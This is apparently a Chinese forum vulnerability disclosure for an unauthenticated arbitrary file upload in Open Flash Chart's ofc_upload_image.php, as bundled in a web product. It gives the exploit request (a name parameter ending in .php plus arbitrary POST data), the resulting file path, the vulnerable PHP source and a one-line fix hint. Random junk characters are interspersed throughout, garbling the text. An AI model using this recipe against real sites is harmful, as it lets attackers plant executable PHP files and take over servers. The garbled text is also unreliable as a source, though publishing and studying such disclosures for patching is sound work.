POST 数据漏洞文件执行任意后缀文件保存3 z3 c& `7 {! s: ^9 T& X, R! u7 e
漏洞文件/chart/php-ofc-library/ofc_upload_image.php
. H" a/ W$ z& ?! u2 v2 `2 c
' K: z; t) \* @, c利用:
- s$ C0 _$ a6 g$ e. f* V( V: V/chart/php-ofc-library/ofc_upload_image.php?name=hfy.php hfy.php 文件名3 A( J* b/ z. N
& z: m1 F. }3 Z2 f! O! YPost任意数据
2 Y6 x( L7 C: c# q保存位置http://localhost/chart/tmp-upload-images/hfy.php
2 M. u, v" p& T t3 E; O! B) ? T6 Z
8 S: Q# u; r" ^/ W) I2 |0 \
最新版wss漏洞文件,即使是收费版本也有的,在新浪商店部署的demo~9 }3 y Y& _, X* b+ ~7 K
$ U4 ?7 a/ o \: r- J5 b
<?php
# B( B) [, u2 o% F7 B9 x7 L( Y: s- I" M1 F0 S& t7 j5 o8 O
//
- I; s" j. m8 \4 o d8 s// In Open Flash Chart -> save_image debug mode, you
" l1 _5 `8 q- \: ?; R( d8 C5 E3 V// will see the 'echo' text in a new window.
8 J9 t: g3 W* t' F. O//2 I3 S+ Q* I$ p% k: o) z2 L
0 f% L3 a& ?% O: C# G/*) T; c% c! {2 q
( M: E; r2 _1 C" wprint_r( $_GET );) X) P1 P4 j' A
print_r( $_POST );
. S" U" M3 f& u, R, p! {' l* ~print_r( $_FILES );% m: G5 M! D) I) G+ M
5 z% q# P& U% T" a
print_r( $GLOBALS );
7 P8 H3 Y6 q! @! |) ^* Zprint_r( $GLOBALS["HTTP_RAW_POST_DATA"] );& r& k" L7 `( K' x5 l& Q
. q" @- ]) P# ]2 j*/" h9 E$ m% d; u9 L
// default path for the image to be stored //. s+ J+ o/ }0 E4 q
$default_path = '../tmp-upload-images/';) E, d( K" x( r3 Z/ v8 k
, `: {+ D. m0 i( u8 ?if (!file_exists($default_path)) mkdir($default_path, 0777, true);
. Z* e9 C5 N" P$ d) b( S8 `# A8 i/ ~
7 I8 u. C' ~) D3 F// full path to the saved image including filename //
5 n+ N3 s! q, o# S$destination = $default_path . basename( $_GET[ 'name' ] ); & b. q: U2 p% R! |' Y
; k; h4 S7 F7 }+ Z/ v, D2 `5 Yecho 'Saving your image to: '. $destination;$ O2 {9 N2 a, e* U8 c
// print_r( $_POST );3 g1 Q! b& W3 M
// print_r( $_SERVER );
# e" A' Q5 j; M0 y// echo $HTTP_RAW_POST_DATA;$ r# Z1 G3 l, k
) G4 W, J/ Z4 v# H9 R9 M. y; F//! I) |( r6 P' w
// POST data is usually string data, but we are passing a RAW .png
9 k% R3 Z% W# D6 }// so PHP is a bit confused and $_POST is empty. But it has saved8 L% l1 n/ R9 N2 u1 O* y
// the raw bits into $HTTP_RAW_POST_DATA# D3 X, r. j( j7 J5 c) F& j1 h5 {
//
6 X+ X2 ]8 p4 U; l: [" a7 {8 Q- S; S2 k9 Z% d
$jfh = fopen($destination, 'w') or die("can't open file");# U% w! z t4 K2 }3 u# K: _8 H# u
fwrite($jfh, $HTTP_RAW_POST_DATA);* ^0 H$ ]6 I" W4 d0 r: w8 k
fclose($jfh);
) F6 Q# _, N7 h8 Q% `8 D/ I' o+ q* C# o% t
//
+ L! [8 D; O7 O7 E" |% C k* D// LOOK:: v Y* F |% Q% r) C% M* J
//
3 s8 B9 L. y" d/ q' oexit();9 `. Z# N( f/ x6 R
//
4 j2 |: Q8 S+ p6 A0 g1 ~// PHP5:, N& ?& y! k, A
//7 P0 R E) @$ Z9 U
5 o/ I0 R7 @$ T1 _; v
, M, m! n. O! Q; v K* G& r V. c// default path for the image to be stored //
1 O2 R& A8 U9 d5 _. ^) F$default_path = 'tmp-upload-images/';* V- C. t3 b) q+ F* _
3 W0 R! h \, J& O& ~3 ^
if (!file_exists($default_path)) mkdir($default_path, 0777, true);& n: C5 o" R# F4 v5 V, i! k
/ `. @# _8 A. h* g$ V# X- x- \
// full path to the saved image including filename //
- I; R( M0 W4 ]1 g; F0 t3 R$destination = $default_path . basename( $_FILES[ 'Filedata' ][ 'name' ] );
2 _+ q3 o/ Y3 ?
$ c# f1 g7 B6 a+ f4 O// move the image into the specified directory //9 r6 G; l8 j" M- d
if (move_uploaded_file($_FILES[ 'Filedata' ][ 'tmp_name' ], $destination)) {% S: Z' {0 q1 n) q4 {5 c0 |0 L$ p: Z
echo "The file " . basename( $_FILES[ 'Filedata' ][ 'name' ] ) . " has been uploaded;";( \" E0 y q; W2 R" o! l( M
} else {" @2 X+ R9 T3 T# t
echo "FILE UPLOAD FAILED";* T$ l+ K( S9 i$ X) ]
}! K' f/ X P1 s: O* O8 p6 U& E
) {- p5 o( D; j6 h
' G. \* Y+ q6 L% ??>
* |7 ?; {4 W: m9 h" C7 A/ }% `
% |/ ^6 K6 M; h# v' h
% G4 D U! {" J4 u6 q% C! |% u \- A0 i1 h+ i3 r, ]# J
4 e! l( u) G/ i6 C6 `) }
5 R7 R0 }1 k* i1 n$ n" C+ d: p) X+ y9 S$ T: Z
修复方案:
( m& v' s$ Q7 s) |/ T这个漏洞文件就是个杯具,怎么破,加权限验证,后缀等验证~,自己搞 . n3 H& ^2 a3 n
) W6 [1 g4 d5 i! o( \( B) K
' v6 L% l8 h. z5 ~
- J4 J* F- R4 C8 C9 ^0 P/ }. c# A7 c( F$ `
|